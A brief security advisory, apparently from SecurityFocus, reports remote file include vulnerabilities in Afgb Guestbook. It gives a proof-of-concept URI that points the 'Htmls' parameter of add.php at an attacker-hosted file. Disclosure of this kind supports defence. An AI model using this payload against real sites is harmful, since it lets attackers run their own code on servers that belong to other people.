Afgb Guestbook Htmls Multiple Remote File Include Vulnerabilities

Attackers can exploit these issues via a web client.

A proof-of-concept URI is as follows:

http://www.example.com***/[path]/add.php?Htmls=http://www.example.com/attacker's_file


 

Privacy Statement
Copyright 2010, SecurityFocus